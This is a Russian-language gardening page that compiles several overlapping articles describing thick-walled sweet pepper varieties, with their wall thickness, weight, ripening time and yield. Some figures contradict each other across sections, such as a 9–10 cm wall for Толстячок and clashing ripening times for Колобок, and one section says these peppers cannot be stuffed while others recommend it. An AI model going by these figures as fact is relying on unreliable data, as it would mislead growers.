1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Сорта перца сладкого толстостенного для открытого грунта

Лучшие сорта толстостенного сладкого перца

Толстостенный перец имеет насыщенный вкус, мясистую мякоть и, как правило, приятный, сильный аромат. К данной группе причисляют те виды сладкого перца, у которых толщина перикарпия (стенки) не меньше 6 мм. Лучшие сорта толстостенного сладкого перца по категориям представлены в этой статье.

Сорта толстостенного сладкого перца для открытого грунта

В незащищенном грунте выращиваются наиболее стойкие к изменениям погоды виды перца. Обычно они зависимы от солнечного света, но в возделывании простые.

Сорта толстостенного сладкого перца для открытого грунта

  • «Анастасия» – урожайный сорт сладкого перца, способный приносить до 18 плодов с каждого кустика, а с квадрата участка можно собрать до 8 кг. Период созревания – 130 суток. Плоды мясистые, массой по 200-250 г, перикарпий – 0,6-0,8 см. Мякоть с выраженным запахом, сочная. Окрас шкурки красный, мякоти – вишневый. Рекомендуется для летних закусок, зимних заготовок, фаршировки, заморозки.
  • «Колобок» – простой в выращивании вид и потому довольно востребованный. Овощ практически круглый, откуда и пошло название. Растет куст до 40 см. Плоды способны вызревать даже при низких температурах, так что сорт нередко приобретают для возделывания на Урале и в Сибири. Срок созревания – 130 суток в среднем, бывает и меньше. Вес плодов – 100 г, стенка – 0,8-1 см. Использовать их особенно удобно для фаршировки и консервирования.
  • «Толстячок» — сладкий перец, отличается рекордной толщиной стенки, которая может достигать 1 см. Сами плоды маленькие, по 65-130 г, мякоть с обилием сока и сахара в составе. Период вызревания – 115-118 суток. Нередко этот вид выращивается для продажи, потому что плоды не только имеют товарные качества, но и пригодны для транспортировки. С квадрата посадок можно собрать примерно 4-4,5 кг перца.
  • «Воловье ухо» — толстостенный перец, растет до 70 см в высоту. Срок созревания – 112-130 суток. Этот сорт очень любит солнечный свет, поэтому его выращивают на самых освещенных участках. Окрас созревших перцев ярко-алый, кожура блестящая. Длина плодов около 15 см, толщина стенки – 0,8 см, вес – 200 г.

Толстостенный перец для теплиц

В тепличных условиях выращивается урожай с приятным вкусом и ярким ароматом. В подобных условиях этот овощ созревает довольно быстро, так что данным методом пользуются огородники, что выращивают толстостенный перец на продажу.

Толстостенный перец для теплиц

  • «Звезда Востока красная» — сорт толстостенного сладкого перца, созревает за 110-115 суток. Овощ может достигать массы в 260 г, окрас вишневый. Размер перикарпия – 0,8-1 см. Применяется для летних закусок, переработки. Урожайность высокая – 7,5-8 кг/м. кв. После сбора урожай может долго хранится.
  • «Барин» – ранний вид, созревающий за 115 суток в среднем. Плоды после полного созревания красные, весом по 170-200 г и стенкой около 0,9 см. Есть иммунитет к вирусу табачной мозаики, вершинной гнили. Использование урожая универсально.
  • «Золотое чудо»– интересный вид желтого перца. Период вызревания – 110-115 суток. Плоды могут завязываться и в прохладное лето. Перец растет массой по 180-250 г. Размер стенки – 7 мм. Мякоть с выраженным запахом, сочная. С квадрата посадок снимают примерно 7,5 кг плодов. Урожай хорош для летних салатов и консервирования. Есть иммунитет к грибкам и стойкость к изменениям погодных условий.
  • «Джемини F1» – гибрид, устойчивый ко многим видам заболеваний. Может выращиваться в прохладном и теплом климате. Созревает овощ через 120 суток. Перец растет до 300-400 г, форма удлиненно-кубовидная. Размер стенки – 0,8 см. Окрас после полного созревания ярко-желтый. Урожай универсального использования.

Лучшие голландские толстостенные сорта

Голландские сорта толстостенного сладкого перца славятся своим высоким качеством. Семена у них имеют превосходную всхожесть, сам овощ отличается урожайностью и приятными вкусовыми качествами.

Лучшие голландские толстостенные сорта

  • «АристотельX3R F1» – гибрид, который может без проблем выращиваться в регионах с прохладным, переменчивым или жарким климатом. Он быстро приспосабливается к погоде. Созревание – среднераннее. Кусты по 50 см. Плоды кубические, продолговатые, массой по 350-450 г. Размер перикарпия – 1 см. Окрас вишневый, шкурка блестщая. Урожайность – 5-5,5 кг/квадрата.
  • «Клаудио F1» подходит для возделывания в теплых регионах. Созревание урожая наблюдается за 130-140 суток. Перец длиной 20 см и шириной около 10 см. Размер стенок – 10 мм. Окрас после полного вызревания – алый. Гибрид устойчив ко многим заболеваниям. С растения за сезон можно собрать 3-4 кг плодов.
  • «Атлантик F1» созревает примерно за 110-120 дней. Плоды растут по 150-190 г. Толщина перикарпия – 10 мм. Шкурка плотная, но нежная, с блеском. Окрас вишневый. Нуждается в обильном освещении. Урожайность этого сорта высокая. Плоды лучше всего использовать для консервирования или свежей еды.

Суперранние разновидности

Суперранние сорта толстостенного перца выращиваются преимущественно на продажу. Благодаря короткому сроку созревания они дают ранний урожай, тем более, если выращивать их в теплице, рассадным методом.

  • «Толстый барон» созревает всего за 90 суток. Есть иммунитет ко многим заболеваниям. Перец красного цвета, яркий, с глянцевой шкуркой, форма цилиндрическая, масса – 300-350 г в среднем, но встречаются и гиганты под 500 г. Толщина стенки – 10 мм. Урожайность с кустика – 7 кг. Урожай долго хранится после сбора, пригоден для транспортировки.
  • «Заря F1» созревает примерно за 90 суток. Плоды конусовидные, после полного созревания имеют красный окрас. Вес – 100-120 г, толщина стенки – 8 мм. Мякоть сочная, ароматная. С квадрата посадок можно собрать до 8 кг овоща. Урожай транспортабельный, с отличными товарными качествами. После сбора хорошо хранится. Есть иммунитет к вертициллезу. Использование универсальное.
  • «Квикли F1» – ранняя разновидность для теплиц и незащищенного грунта. Созревание происходит за 80-90 суток. Перец в виде конуса, с глянцевой шкуркой красного цвета. Вес – 100-120 г. Размер стенки до 7 мм. Вкус насыщенный, сладкий. Перец товарного качества, годится для долгих перевозок. Есть иммунитет к вирусам, хорошо переносит стрессовые условия роста. Урожайность в теплице до 9 кг с квадрата, в открытом грунте – не больше 5 кг/м. кв.

Сорта крупноплодного толстостенного перца

Крупноплодные разновидности перца нравятся огородникам за то, что имеют товарный вид и обладают приятным вкусом.

Сорта крупноплодного толстостенного перца

  • «Бел Гой» – поздний вид для теплиц и незащищенного грунта. Растет до 600 г. Размер перикарпия 0,9-1 см. Кусты растут до 1,2 метров, но места на участке много не занимают. Сорт нуждается в регулярных подкормках, своевременных поливах. Урожайность высокая, стабильная.
  • «Солнце Италии» – культура, отличающаяся большими плодами – до 500 г. Созревание происходит за 115-120 суток. Может возделываться под открытым небом или в парниках. Размер перикарпия – 0,6-0,8 см. Мякоть с выраженным запахом, очень вкусная, годится для летних закусок, зимних заготовок, фаршировки. С квадрата участка можно собрать 5-6 кг урожая.
  • «Белое золото» разновидность овоща сибирской селекции. Перец способен вырастать до 450 г. Перикарпий – 1 см. Плоды кубовидные, бледно-желтого цвета. Созревает урожай быстро, но для нормального роста кустам требуется регулярная подкормка. Сорт годится для возделывания под открытым небом или в парниках. Сбор урожая проходит с июля по август.

Лучшие сорта толстостенного перца для Подмосковья

В средней полосе России можно выращивать многие разновидности перца.

Лучшие сорта толстостенного перца для Подмосковья

  • «Красный гигант» – урожайный сорт толстостенного сладкого перца, дающий с кустика примерно 10 кг перца. Кусты высокие, до 1,2 м. Плоды кубовидной формы, длиной примерно 20 см и шириной около 10 см. Средняя масса – 250-300 г. Размер перикарпия до 1 см. После полного вызревания стенки приобретают приятный вишневый цвет. Вкус сладкий, аромат нежный, использование универсально.
  • «Новогогошары» – ранний вид, созревающий за 110-115 суток. Плоды большие, форма плоско-круглая. Окрас шкурки красный. Вес овоща 90-140 г. Толщина перикарпия – 1 см, лежкость превосходная, транспортабельность приемлемая. Использовать этот сорт можно для зимних заготовок, фаршировки.
  • «Биг Бой» – толстостенный перец, созревающий в среднем за 100-105 суток. Овощ вишневого окраса, сочный, сладкий, по 300 г. Толщиной перикарпия 0,8 см. Урожайность с квадратного метра около 7,5 кг. Использование урожая универсально.

Сорта толстостенного перца для Сибири и Урала

Толстостенный перец, что подходит для Урала или Сибири отличается устойчивостью к стрессовым условиям роста. Также такие сорта имеют сокращенный срок созревания. Они способны завязывать плоды даже в прохладную погоду и в обилии солнечного света не нуждаются.

Сорта толстостенного перца для Сибири и Урала

  • «Яблочный спас» – это ранняя разновидность. Плоды по 100-150 г, но бывают и рекордсмены под 300 г. Толщина стенок – 7 мм. Мякоть сочная, сладкая, с сильным ароматом. С одного кустика за сезон можно собрать 1,5 кг плодов. Подходит этот овощ для фаршировки, заморозки, свежих салатов.
  • «Сибирский формат» – устойчивое растение, нуждающееся в опоре. Его возделывают в открытом и закрытом грунте. Обладает иммунитетом ко многим заболеваниям и неблагоприятному климату. Плоды растут до 400 г. Сорт отличается растянутым плодоношением. С одного растения можно собрать за сезон примерно 4 кг перца.
  • «Хит Сезона» созревает за 95-115 дней. Растение до 50 см в высоту, может выращиваться в любых видах парников и теплиц. Плоды по 150-350 г, кубические, стенки по 9 мм в толщине. Окрас созревших плодов – темно-красный. Урожай используется для зимних заготовок, летних салатов, фаршировки, заморозки. Есть иммунитет к некоторым заболеваниям, устойчивость к похолоданиям, плохой освещенности.

Разновидностей перца с толстыми стенками очень много. Чтобы выбрать качественный сорт, необходимо определиться, где он будет выращиваться, какими качествами должен обладать. А семена на посев, рекомендуется приобретать только в специализированных магазинах, ведь на рынке, где продают их на развес, трудно убедиться в подлинности сорта.

Сорта перца сладкого толстостенного для открытого грунта

Одной из определяющих характеристик сорта перца сладкого является толщина перикарпия (околоплодника). Именно эту часть растения употребляют в пищу. Чем толще стенка плода, тем рентабельнее выращивание того или иного сорта. Толстостенными считаются сорта с толщиной перикарпия 6 мм и выше.

Сорта перца сладкого толстостенного для открытого грунта

Содержание пошаговой инструкции:

Красный гигант

Среднеспелый сорт, характеризующийся высокой урожайностью (7-8 кг с куста). Отличается большими плодами кубовидного типа (20 х 10 см), красно-малинового цвета с мясистыми стенками (толщина 6-10 мм). Масса одного плода — 250-300 г. Плоды отличаются высокими вкусовыми качествами: вкус перца Красный гигант сладкий, насыщенный. Плоды хороши как для употребления в свежем виде, так и в составе разнообразной консервации.

Кусты растения мощные, высотой до 1,2 м. Урожайность «Красного гиганта» — до десяти плодов с куста. Этот вид перца адаптирован под открытый грунт, но подходит и для тепличного выращивания. Оптимальная схема высадки кустов — 70 х 40 см. Рассаду высаживают на 70-80 день после всходов.

Фото перца «Красный гигант»

Наиболее высокую урожайность сорт демонстрирует на суглинистых почвах с хорошей воздухопроницаемостью. На протяжении вегетационного периона обязательна подкормка кустов минеральными удобрениями.

Для повышения всхожести семена вымачивают в растворе марганцовокислого калия и обильно промывают водой.

Толстячок

Название сорта говорит само за себя: толщина перикарпия плодов этого среднеспелого сорта составляет 9-10 см. Плоды толстячка призмовидные, с выраженным глянцевым блеском. Как и предыдущий, этот сорт подходит и для выращивания на грядках, и для тепличной высадки. Оптимальный период для высаживания рассады — конец мая. Наилучшая урожайность наблюдается при схеме высадки 40 х 60 см.

Кусты «толстячков» приземистые — 50-55 см. максимум, довольно раскидистые. При благоприятных условиях с одного квадрата можно собрать до 4,5 кг. плодов. Качественные характеристики плодов следующие:

  • перикарпий — 7-10 мм;
  • длина — 10-12 см;
  • ширина — 6-8 см;
  • масса плода — 60-130 г.

Среднеранний сорт перца «Толстячок»

Сорт не особо капризен в уходе: для обеспечения высокой урожайности достаточно регулярных поливов и единоразового внесения минеральных удобрений в грунт.

Воловье ухо

Среднеспелый гибридный сорт, выведенный специально для выращивания на открытых почвах рассадным способом. Отличается высоким иммунитетом ко многим вирусным заболеваниям, поражающим другие виды сладкого перца.

  • перикарпий — 6-8 мм;
  • длина плода — до 16 см;
  • масса — 150-200 г.

Созревшие плоды отличаются насыщенным ярко-красным цветом с глянцевым блеском. Стенки плода долго сохраняют плотность, не повреждаются при транспортировке.

Перец Воловье ухо

В период вызревания кусты достигают до 0,7 м в высоту. С одного куста можно получить 2-3 кг перца. Сорт Воловье Ухо чувствителен к минеральной наполненности грунта. Растение не любит почвы, на которых в прошлых сезонах выращивались томаты. Лучшими «посадочными местами» для сорта Воловье ухо являются грунты после крестоцветных: капусты, репы и т.д. Главное условие хорошего урожая — достаточное количество тепла. Сладкому перцу, и данному сорту в частности требуется гораздо больше солнечного света, чем огурцам и томатам. Кусты, растущие в затененных участках низкие, хилые, плоды не набирают предусмотренные характеристиками сорта размер и массу.

Видео — Семена перца » Воловье ухо «

Толстый барон

Данный сорт отличается высокой урожайностью (с одного квадрата можно собрать до 7 кг перца). В перце Толстый барон содержится повышенное количество витамина С (до 155,7 мг на штуку). Плоды отличаются красивой конусовидно-цилиндрической формой, урожайность — 8-9 шт с куста.

Толстый Барон — перечный сорт до 245 грамм и кустиком метровой высоты

Кусты Толстого барона раскидистые, шаровидные, с толстыми стеблями. Высота куста редко превышает 0,5 м.

Толстый барон — один из рекордсменов по толщине стенок (9-10 мм). Средняя масса плода — 250-300 г, известны случаи выращивания экземпляров весом до 500 г.

Сорт раннеспелый (срок с момента всходов до достижения плодами технической спелости составляет 90-100 суток). Высадка в грунт производится в начале июня. Для максимальной продуктивности рекомендуется высаживать не более 5 растений на квадратный метр (лучше всего 3-4). Сорт отличается устойчивостью к одной из самых распространенных вирусных болезней сладкого перца — табачной мозаике.

Колобок

Толщина стенок перца «Колобок» 8-9 мм

Очень компактный сорт перца (в высоту растения не превышают 0,4 м), идеально подходящий для выращивания на открытом грунте. Внешние характеристики плода полностью соответствуют названию: «колобки» отличаются шаровидной формой, гладкие, с глянцевым блеском. Спелые плоды имеют выраженный пряный аромат. Лучше всего перец подходит для консервации и фаршировки, но неплох и в свежем виде.

  • перикарпий — 6-10 мм;
  • масса плода — 100-140 г;
  • длина — до 5,5 см;
  • ширина — 7-8 см.

Как и Толстый барон, этот сорт является раннеспелым (сроки созревания — 130-140 дней). Идеальное время для высадки рассады в открытый грунт — середина мая, когда опасность заморозков уже позади. Рекомендуемая глубина высадки — не менее 18 см, расстояние между кустами — 30-35 см. Для повышения урожайности рекомендуется закладка в каждую лунку золы и перегноя.

Плоды хорошо завязываются даже при низких температурах. В уходе сорт не особо требователен, в дорогостоящих удобрениях не нуждается. Обязательным условием является еженедельный полив и периодическое рыхление грунта. Недостаток влаги способен быстро убить растения. Зато сорт устойчив ко многим заболеваниям сладкого перца: вирусная мозаика, черная плесень, вертициллезное увядание.

Перец сладкий «Колобок»

Сибирский формат

Гибридный среднеспелый сорт, выведенный селекционерами Сибири. Плоды перца Сибирский формат кубовидные, мясистые, темно-красного цвета, в каждом перчике по 3-4 камеры.

На одном кусте могут сформироваться до 15 плодов.

  • перикарпий — 8-10 мм;
  • длина — 12 см;
  • ширина — 10 см;
  • масса плода — 300-450 г.

Некоторые экземпляры могут достигать 18 см в длину и весить более 500 г. Но таких показателей можно добиться только при тепличном выращивании и усиленной подкормке растений. При выращивании на открытых грунтах масса плодов редко превышает 400 г. На одном квадратном метре можно разместить от 5 до 7 растений.

Перец «Сибирский формат»

Кусты Сибирского формата высокие (0-7-0,8 м), полуштамбового типа. С одного растения можно получить до 3,5 кг перца. Сорт требователен к химическому составу грунтов и влажности: при отсутствии подкормки урожайность будет низкая. Для удобрения почвы при выращивании данного сорта используются комплексные минеральные удобрения.

Закладка семян на рассаду производится за 2 месяца до высадки перца в грунт. Сорт характеризуется средней (до 70%) всхожестью. Идеальная температура прорастания семенного материала 26-28°С.

Калифорнийское чудо

Один из самых популярных среднеспелых сортов сладкого перца у отечественных дачников. Сорт остается востребованным на протяжении многих лет благодаря яркому сладкому вкусу и высокой концентрации витамина С в плодах. В стадии полного вызревания перчики имеют кубовидную форму и алый окрас.

Характеристики плодов:

  • перикарпий — 6-8 мм;
  • длина — до 8см;
  • ширина — 6-7 см;
  • масса — 130-150 г.

Взрослые растения достигают 0,7 м в высоту, ветви прочные, упругие, не требующие подвязывания. С одного растения можно получить 12-15 плодов. При этом перцу не требуются особые условия ухода, достаточно регулярного полива и подпитки почвы базовыми минеральными удобрениями.

Перец «Калифорнийское чудо»

Как и предыдущие сорта, Калифорнийское чудо выращивается рассадным методом. Высадка в открытый грунт производится через 2,-2,5 мес после всходов, в начале июня. Оптимальная схема высадки — 40 х 45 см. Первая подкормка производится через 10-12 дней.

Для нормального роста и урожайности перца важно соблюдение баланса влаги в почве. Растение чувствительно к засухе, но при этом ему вредит и застой воды.

Перец сладкий «Калифорнийское чудо» красное

Анастасия

Среднеранний сорт перца с хорошей всхожестью. Вегетационный период (срок с момента появления всходов до достижения плодами технической зрелости) составляет 130 дней. Плоды удлиненные, конусовидной формы, аппетитного вишневого цвета. Мякоть однородная, плотная, насыщена витаминами и минеральными солями.

  1. Перикарпий — 6-8 мм.
  2. Длина — 12 см.
  3. Ширина — 8-9 см.
  4. Масса — 200-250 г.

Кусты штамбового типа, раскидистые, высота одного растения составляет 0,6-0,8 м. Максимальное количество плодов, способное сформироваться на одном кусте — 18. Сорт отличается низкой восприимчивостью к температурным колебаниям и основным болезням сладкого перца. Единственное, чего ревностно требует «Настя» (так ласково называют сорт некоторые огородники) — достаточная влажность почвы.

Сладкий перец «Анастасия»

Закладка семян на рассаду производится в начале марта, высадка в грунт — в конце мая-начале июня. Рекомендуется соблюдать посадочную схему 60 х 40 см.

Белозерка

Среднеранний гибридный сорт, характеризующийся стабильно высокой урожайностью. Вегетационный период составляет 115-120 суток. Плоды перца Белозерка конусовидной формы, без граней. В стадии технического созревания плоды приобретают бледно-желтый цвет, по мере биологического созревания краснеют. «Изюминкой» сорта является способность долго храниться без потери плотности стенок и появления гнили.

Перец сладкий Белозерка

Характеристики плода:

  • перикарпий — 6-7 мм;
  • длина — 9-10 см;
  • ширина — 4-6 см;
  • масса плода — 80-90 г.

Данный сорт среднерослый (кусты не превышают 0,7 м в высоту). С одного кв.м можно собрать до 8 кг перца. Лучшее время для закладки семян на рассаду — начало марта. Идеальный температурный режим для прорастания семенного материала — 25°C. Пересадка в грунт производится в конце мая-начале июня (оптимальный период для высаживания большинства сортов сладкого перца). По мере созревания производится подпитка корневой системы комплексными минеральными удобрениями для овощных культур.

Видео — Семена перца » Белозерка «

Условия выращивания сладкого перца в открытом грунте

С момента появления первых всходов у перечной культуры до созревания плодов проходит довольно продолжительный период: в среднем это 110-125 дней. При условии, что все это время температура должна быть порядком выше +20 градусов, в некоторых российских регионах дачники понимают, что это невозможно. Такое продолжительное лето встречается только на юге, более того, перечная культура крайне требовательна к обилию солнечного света.

Однако выход из ситуации есть. Процесс выращивания перца разделяют на три отдельных этапа:

  • выбор и посев семян;
  • выращивание рассады в домашних условиях;
  • высадка рассады в открытый грунт.

Этот способ имеет название «рассадный» и уместен как в средней полосе России, так и на юге. Теперь перейдем непосредственно к сортам сладкого перца с толстой стенкой.

Сорта толстостенного сладкого перца

Описывать будем только сорта перца сладкого толстостенного для открытого грунта и гибриды. Ниже в таблице указаны сорта и толщина стенок плода.

Название сорта или гибрида

Толщина стенки в миллиметрах

Среди этих перцев встречаются сорта различных расцветок:

Не стоит переживать, это многообразие зависит от природных особенностей, перцы необычных цветов также полезны и пригодны в пищу.

Относится к лучшим сортам перца, выращиваемых на территории России. Он очень красив, отличается яркой расцветкой и толстой стенкой. Плоды имеют вес до 200 грамм, урожайность на 1 квадратный метр составляет в среднем 10 килограмм. Это отличный показатель. Плоды созревают на 110 день после появления первых всходов.

Биг мама

Очень крупный и сладкий перец устойчив к вирусу табачной мозаики. Относится к раннеспелым сортам и плодоносит спустя 95 дней. Плоды хорошо хранятся, транспортируются на дальние расстояния. Выращиваются по стандартной схеме. Встречаются в нескольких цветовых вариациях у разных агрофирм.

Биг папа

Сорт «Биг папа» славится не только толстостенными перцами, но и великолепным окрасом плода. На фото видно, какие красивые перцы вы получите с сочным фиолетовым оттенком. Плодоношение наступает спустя 104 дня от появления всходов рассады. Урожайность очень высокая и нередко достигает 7 килограмм с квадрата. Сорт устойчив к вирусу табачной мозаики.

Богдан

Сорт представлен плодами весом до 300 грамм, это настоящие гиганты. При этом само растение невысокое и порой не требует подвязки. Цвет также красив: оттенок от желтого до оранжевого. «Богдан» устойчив к засухе, долго и обильно плодоносит. Относится к ранним сортам сладкого перца, созревает за 100 суток.

Гранова

Сладкий и крупный сорт «Гранова» так же, как и предыдущий, славится величиной плодов. Куст невысокий, крепкий. Плодоношение наступает спустя 100 дней, он идеален для выращивания в открытом грунте. «Гранова» устойчив к засушливости воздуха и почвы, но крайне требователен к свету.

Едино

Гибрид с интересным названием устойчив к некоторым заболеваниям и вершинной гнили. Хорошая урожайность (до 5 килограмм с квадрата) порадует любого огородника. Растения невысокие, крепкие, а плоды достаточно крупные, обладающие приятным перечным ароматом. Прекрасно подходит для приготовления любых блюд и употребления в свежем виде.

Золотое чудо

Уже из названия становится понятно, что перец будет иметь золотистый цвет. Такой перчик считается одним из самых популярных согласно продажам. Он красиво смотрится в салатах, в маринадах и даже при жарке. Плоды «Золотого чуда» очень крупные, располагаются на невысоких кустах. Перец относится к среднеспелым сортам, вызревает за 125 суток.

Золотой юбилей

Этот сорт отлично подходит для выращивания в открытом грунте в средней полосе России, поскольку растение легко переносит кратковременное понижение температуры. Высаживать семена на рассаду нужно либо в феврале, либо ранней весной, поскольку период созревания равен 160 суткам. Растения низкие, довольно крепкие, перцы имеют сначала темно-зеленый цвет, переходящий в ярко-желтый.

Золотой фазан

Среднеспелый «Золотой фазан» вызревает спустя 130 суток после появления ростков. Перец очень сочный и относится к одним из самых толстостенных. Он устойчив к некоторым заболеваниям, высаживается по стандартной схеме. Требователен к плодородию почвы, поливу и солнечному свету. Внешне перчик напоминает плод хурмы.

Индало

Гибрид с названием «Индало» устойчив к вирусу табачной мозаики. Он отлично плодоносит и относится к среднеспелым сортам, вызревающим к 120-ому дню. Выращивают стандартно, куст получается высокорослым, отчего изначально формируют лишь два стебля, иначе количество плодов сократится. Подвязывать не нужно, основанием будет служить шпалера. Перчики ярко-желтые крупные, достигают 300 грамм при длине в 11-12 сантиметров.

Калифорнийское чудо

Один из самых популярных толстостенных перцев в стране. Он хорошо растет в южных регионах и Черноземье, поскольку благоприятная температура для выращивания колеблется в диапазоне от 24 до 25 градусов выше нуля. Растение мощное, плоды средние, обладают интересными потертостями. Сорт вызревает максимум спустя 130 суток.

Кардинал

Необычная цветовая гамма плодов, бесспорно, привлечет внимание каждого, кто интересуется выращиванием перца самостоятельно. Толстостенный перец «Кардинал» устойчив к вирусу табачной мозаики. Перец раннеспелый, вызревает всего за 80-90 дней. Урожайность крайне высокая, достигает 14 килограмм с квадратного метра. Сорт универсален и использоваться может в любом блюде.

Кинг Конг

Толстостенный перец «Кинг Конг» не только очень красив, но и один из самых крупных. Один такой плод может достигать 500 грамм. Это настоящие гиганты, что оправдывает само название. Срок созревания тоже небольшой, всего 90-95 дней, плодоношение длительное. Еще один плюс – это способность завязывать плоды при пониженных температурах.

Красный гигант

Один из самых устойчивых сортов, он плодоносит и на Урале, и в Сибири, выдерживает понижения температур и сильную жару и засуху. При этом на образование завязей это не влияет. Урожайность крайне высокая, до 10 килограмм с квадратного метра. Сами плоды огромные, достигают по весу 600 грамм. Сам перец длинный, куст мощный, высокий, выращивается на шпалерах.

Красный колокольчик

Среднеспелый гибрид «Красный колокольчик» вызревает на средней высоте кустах. Сам перец очень ароматный и сочный. Растению не страшна вершинная гниль, некоторые болезни. Перцы средней величины, выращиваются именно в открытом грунте. Сорт универсальный, требования к выращиванию стандартные.

Колобок

Название для сорта подобрано неслучайно. Перцы имеют округлую форму, они интересно смотрятся на грядках и при мариновании целиком. Кроме того, он относится к одним из лучших толстостенных сортов перцев. Выведен в Молдавии, урожайность высокая, а плодоношение наступает спустя 140-155 суток. Растения довольно низкие.

Мерседес

На одном штамбовом растении сорта «Мерседес» образуется порядка 15-20 перцев, каждый из которых достигает веса в 180-200 грамм. Это объясняет высокую популярность среди дачников. Сорт относят к раннеспелым, неприхотливым. Использование универсальное, особо он хорош в свежем виде, поскольку имеет приятный аромат.

Новогогошары

Еще один привлекательный сорт с точки зрения внешнего вида. Плоды имеют округлую форму, чуть сплюснуты и внешне немного напоминают перцы «Колобок». Вирус табачной мозаики ему не страшен, завязи легко образуются на штамбовых кустах спустя примерно 4 месяца после посева. Плоды можно снимать зелеными и красными.

Ожаровский

Рассаду гибрида высаживают в грунт в возрасте 55 дней, для этого выбирают теплый солнечный день, лучше послеобеденные часы. Сорт ранний, дает обильный урожай довольно крупных плодов. Хозяйки любят использовать его в консервации.

Оранжевое чудо

Перец имеет ярко-оранжевый цвет, плоды достаточно крупные, как и само растение – оно высокое и мощное. Сам сорт созревает рано, некапризен и прекрасно подходит для выращивания в открытом грунте.

Первенец Сибири

Этот перец известен многим дачникам, он неприхотлив в выращивании, болезнеустойчив, дает большой урожай. Специально создавался для средней полосы России. Растение низкое, не раскидистое, зато на побегах образуется большое число завязей. Сами плоды небольшого размера.

Толстячок

Среднеранний сорт «Толстячок» имеет универсальное использование, хорошо реагирует на подкормки и идеально подходит для выращивания в открытом грунте. Он не любит тесноты, поэтому рекомендуется высаживать по 3 растения на квадратный метр. Пикировку рассада не любит.

Обзор толстостенных устойчивых к болезням перцев также представлен на видео ниже.

Заключение

Толстостенные перцы очень популярны, они сочные, ароматные, а некоторые из них достигают огромных размеров. Всегда приятно собирать такой урожай на своем участке!

Сорта толстостенного перца

Здесь собраны самые толстостенные сорта болгарского перца, предназначенные как для посадки в теплицах, так и для непосредственного произрастания в открытой почве. Это и сортовые, и гибридные семена, выращивание из которых приводит к урожаю перчика, отличающегося особой мясистостью и предназначенного для приготовления, например, лечо или салата. Фаршировать такие сорта не получится.

Сами растения могут быть любого роста и размера, раскидистые или не очень. Большинство видов получено у сибирских или уральских селекционеров, есть и голландские культуры. Многообразие цветовой гаммы и формы плода делает выбор сорта затруднительным.

Обычно семена нуждаются в предварительной обработке перед высадкой, заключающейся в замачивании и набухании при температуре воды +50 градусов на протяжении 5 часов. Далее, обернув их во влажную марлевую ткань, хранят в прохладном месте (+20 градусов) до 2-3 суток. Затем высаживают в стаканчик из торфа, в грунт же не переваливают, а сразу помещают со стаканчиком.

Средний срок вызревания плодов- 110 дней, поливы, подвязки, удаление сорняков и подкормки могут сократить его. Кстати, недоспевшие плоды обладают повышенным содержанием витамина С.

Приятного вам выбора!

Перец Партнер

Описание и характеристика перца Партнер F1, отзывы, фото Среднеспелый, урожайный гибрид сладкого перца с крупными толстостенными плодами. Рекомендуем выращивать его в теплице с подвязкой к опоре и пасынкованием. Как формировать растение перца Партнер смотрите в видео ниже. Период от высадки рассады
Показать полностью.

Перец Ливадия

Описание и характеристика перца Ливадия F1, отзывы, фото Среднеспелый, крупноплодный, урожайный гибрид сладкого перца. Рекомендуем выращивать его в теплице с подвязкой к опоре и частичным пасынкованием. Как формировать растение перца смотрите в видео ниже. Период от высадки рассады в грунт до начал
Показать полностью.

Перец Грек

Описание и характеристика перца Грек, отзывы, фото Среднерослый, среднеспелый сорт, период от всходов до начала технической спелости 105-115 дней, для выращивания в открытом грунте и под пленочными укрытиями. Куст штамбовый, высотой 70-80 см. Основные качества плодов, урожайность Перцы плоскоокруг
Показать полностью.

Перец Бублик

Описание и характеристика сладкого перца Бублик, отзывы, фото Раннеспелый, толстостенный сорт для открытого грунта и пленочных укрытий. Период от всходов до начала созревания составляет около 110 дней. Куст раскидистый, высотой до 70 см. Основные качества плодов, урожайность автор фото Наталья Анан
Показать полностью.

Перец Леся

Описание сладкого перца Леся, отзывы, фото автор фото Анастасия Седова Среднеспелый, толстостенный сорт перца селекции Дениса Терентьева. Один из самых вкусных, среди сладких перцев. Отличный урожай при любой погоде! Куст компактный, высотой в открытом грунте около 60 см, в теплице — до 1 мет
Показать полностью.

Перец Калифорнийское чудо

Описание и характеристика перца Калифорнийское чудо, отзывы, фото Среднеранний среднерослый, детерминантный, урожайный сорт сладкого перца для закрытого грунта. Период от всходов до технической спелости составляет 120-130 дней. Куст высотой 0,7-0,8 метра, лист среднего размера, зеленый. Одновремен
Показать полностью.

Перец Богатырь

Описание и характеристика перца Богатырь: отзывы, фото, урожайность Среднеспелый, крупноплодный, урожайный сорт болгарского перца. Период от всходов до технической спелости составляет 125 — 135 дней, до биологической — 145 — 160. Куст мощный, раскидистый, высотой 55-70 см. Лист т
Показать полностью.

Перец Атлант

Описание и характеристика перца Атлант, отзывы, фото Среднеспелый, среднерослый, крупноплодный сорт перца для открытого грунта и пленочных теплиц. Период от всходов до начала созревания составляет 70-75 дней. Растение раскидистое, высотой 70-75 см, лист крупный, темно-зеленый, слабоморщинистый. Тре
Показать полностью.

Перец Банановый десерт

Описание и характеристика перца сорта Банановый десерт, отзывы, фото Среднеранний, длинноплодный, урожайный сорт болгарского перца от сибирских селекционеров. Рекомендован к выращиванию в открытом грунте и пленочных укрытиях. Период от всходов до начала созревания плодов составляет 120-125 дней. Ку
Показать полностью.

Перец Сибирский валенок

Описание и характеристика перца Сибирский валенок F1, отзывы, фото Раннеспелый, толстостенный, урожайный гибрид болгарского перца для открытого грунта и пленочных укрытий. Куст высотой 60-70 см. Формирование растения после высадки в грунт заключается в удалении листьев и боковых побегов до первой р
Показать полностью.

Перец Клаудио

Описание и характеристика перца Клаудио F1, отзывы, фото Среднеспелый, крупноплодный, жаростойкий голландский гибрид болгарского перца. Рекомендован к выращиванию в открытом грунте и теплицах всех типов. Куст хорошо облиственный, полураскидистый, высотой до 60 см. Формирование заключается в удалени
Показать полностью.

Перец Изабелла

Описание и характеристика сладкого перца Изабелла F1, отзывы, фото Среднеспелый, толстостенный, урожайный гибрид болгарского перца отечественной селекции. Рекомендован к выращиванию в теплицах. Период от всходов до начала созревания составляет 120-125 дней. Этот гибрид неприхотлив в выращивании, о
Показать полностью.

Перец Атлантик

Описание и характеристика сладкого перца Атлантик F1, отзывы, фото Ранний, крупноплодный гибрид болгарского перца для теплиц и открытого грунта. Период от всходов до начала созревания составляет 90-100 дней. Куст высотой 90-100 см. Растение требует подвязки к опоре и пасынкования. Как формировать с
Показать полностью.

Перец Силач

